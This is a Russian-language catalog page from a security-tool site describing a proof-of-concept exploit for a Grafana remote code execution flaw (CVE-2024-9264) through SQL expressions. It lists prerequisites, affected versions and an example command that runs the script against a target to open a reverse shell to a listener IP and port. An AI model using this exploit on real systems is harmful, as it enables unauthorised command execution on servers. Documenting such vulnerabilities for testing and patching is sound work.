Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-9264-RCE-Exploit — Эксплойт Grafana RCE (CVE-2024-9264) | Kitploit
Инструменты/GitHubGitHub/z3k0sec/cve-2024-9264-rce-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubz3k0sec/cve-2024-9264-rce-exploit

CVE-2024-9264-RCE-Exploit

Эксплойт Grafana RCE (CVE-2024-9264)

Репозиторий
3951 год назадПроверено Kitploit
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-9264 RCE-Эксплойт в Grafana через SQL-выражения

Описание

Доказательство концепции удаленного выполнения кода в Grafana (CVE-2024-9264)

Этот репозиторий содержит Python-скрипт, который эксплуатирует уязвимость удаленного выполнения кода (RCE) в функции SQL-выражений Grafana. Используя недостаточную санитацию входных данных, этот эксплойт позволяет атакующему выполнять произвольные команды оболочки на сервере. Это становится возможным благодаря расширению сообщества shellfs, которое может быть установлено и загружено атакующим для облегчения выполнения команд.

Предварительные требования

  • Аутентифицированный пользователь Grafana с правами Viewer или выше
  • Двоичный файл DuckDB должен быть установлен и доступен через PATH Grafana

Затронутая версия

Grafana >= v11.0.0 (все v11.x.y затронуты)

Использование

root@kitploit:~
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

14

Пример

root@kitploit:~
python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001

Отказ от ответственности

Этот скрипт предназначен для образовательных целей и использования в контролируемых средах, где у вас есть разрешение на тестирование безопасности системы. Неправильное использование этого инструмента может привести к юридическим последствиям.

Подробнее

https://zekosec.com/blog/file-read-grafana-cve-2024-9264/

https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/

Скачать инструмент